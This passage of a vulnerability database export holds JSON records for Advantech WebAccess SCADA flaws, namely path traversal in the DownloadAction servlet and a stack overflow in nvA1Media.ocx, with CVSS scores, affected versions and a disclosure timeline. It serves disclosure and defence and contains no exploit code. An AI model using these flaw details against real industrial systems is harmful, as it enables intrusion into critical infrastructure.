"BID", "id": "98311" }, { "date": "2017-06-12T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "date": "2017-04-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201704-931" }, { "date": "2017-05-06T00:29:00.490000", "db": "NVD", "id": "CVE-2017-7929" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-05-04T00:00:00", "db": "ZDI", "id": "ZDI-17-322" }, { "date": "2017-05-19T00:00:00", "db": "CNVD", "id": "CNVD-2017-06980" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-116132" }, { "date": "2017-05-23T16:23:00", "db": "BID", "id": "98311" }, { "date": "2017-06-12T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201704-931" }, { "date": "2024-11-21T03:32:59.230000", "db": "NVD", "id": "CVE-2017-7929" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201704-931" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Path traversal vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-003931" }, { "db": "CNNVD", "id": "CNNVD-201704-931" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "72b8f504-9faf-4e5e-9287-87f7cb248c3e" }, { "db": "CNNVD", "id": "CNNVD-201704-931" } ], "trust": 0.8 } }
var-201805-1145
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the DownloadAction servlet. When parsing the filename and taskname parameters, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003c=v8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "CNNVD", "id": "CNNVD-201805-444" }, { "db": "NVD", "id": "CVE-2018-7503" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005074" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-18-471" } ], "trust": 0.7 }, "cve": "CVE-2018-7503", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-7503", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-7503", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.5, "id": "CNVD-2018-10709", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 0.6, "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.5, "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 0.2, "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-137535", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-7503", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-7503", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-7503", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-7503", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-10709", "trust": 0.6, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201805-444", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-137535", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "VULHUB", "id": "VHN-137535" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "CNNVD", "id": "CNNVD-201805-444" }, { "db": "NVD", "id": "CVE-2018-7503" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to disclose sensitive information on the target. plural Advantech WebAccess The product contains a path traversal vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the DownloadAction servlet. When parsing the filename and taskname parameters, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-7503" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-137535" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-7503", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNVD", "id": "CNVD-2018-10709", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-444", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005074", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5477", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-471", "trust": 0.7 }, { "db": "IVD", "id": "E2F0E621-39AB-11E9-9C2C-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-137535", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "VULHUB", "id": "VHN-137535" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "CNNVD", "id": "CNNVD-201805-444" }, { "db": "NVD", "id": "CVE-2018-7503" } ] }, "id": "VAR-201805-1145", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "VULHUB", "id": "VHN-137535" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10709" } ] }, "last_update_date": "2024-11-23T21:53:07.688000Z", "patch": { "_id": null, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patch for Advantech WebAccess Path Traversal Vulnerability (CNVD-2018-10709)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130717" }, { "title": "Multiple Advantech Product path traversal vulnerability fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80054" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "CNNVD", "id": "CNNVD-201805-444" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137535" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "NVD", "id": "CVE-2018-7503" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7503" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7503" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-471" }, { "db": "CNVD", "id": "CNVD-2018-10709" }, { "db": "VULHUB", "id": "VHN-137535" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005074" }, { "db": "CNNVD", "id": "CNNVD-201805-444" }, { "db": "NVD", "id": "CVE-2018-7503" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-471", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-10709", "ident": null }, { "db": "VULHUB", "id": "VHN-137535", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-005074", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-444", "ident": null }, { "db": "NVD", "id": "CVE-2018-7503", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-05-31T00:00:00", "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-471", "ident": null }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10709", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-137535", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005074", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-444", "ident": null }, { "date": "2018-05-15T22:29:00.597000", "db": "NVD", "id": "CVE-2018-7503", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-471", "ident": null }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10709", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-137535", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005074", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-444", "ident": null }, { "date": "2024-11-21T04:12:15.480000", "db": "NVD", "id": "CVE-2018-7503", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-444" } ], "trust": 0.6 }, "title": { "_id": null, "data": "plural Advantech WebAccess Path traversal vulnerability in products", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005074" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e2f0e621-39ab-11e9-9c2c-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-444" } ], "trust": 0.8 } }
var-201708-1586
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "ZDI", "id": "ZDI-17-566" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-566" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-566", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19440", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-566", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19440", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "ZDI", "id": "ZDI-17-566" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-566" }, { "db": "CNVD", "id": "CNVD-2017-19440" }, { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-566", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19440", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4076", "trust": 0.7 }, { "db": "IVD", "id": "BB9EE99F-8EE6-4289-8DC9-D0C1084165B2", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "ZDI", "id": "ZDI-17-566" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ] }, "id": "VAR-201708-1586", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ] }, "last_update_date": "2022-05-17T02:05:50.435000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\7E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-566" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-566/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-566" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2", "ident": null }, { "db": "ZDI", "id": "ZDI-17-566", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19440", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-566", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19440", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-566", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19440", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess nvA1Media DeviceType 3 Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" }, { "db": "CNVD", "id": "CNVD-2017-19440" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "bb9ee99f-8ee6-4289-8dc9-d0c1084165b2" } ], "trust": 0.2 } }
var-201810-0129
Vulnerability from variot
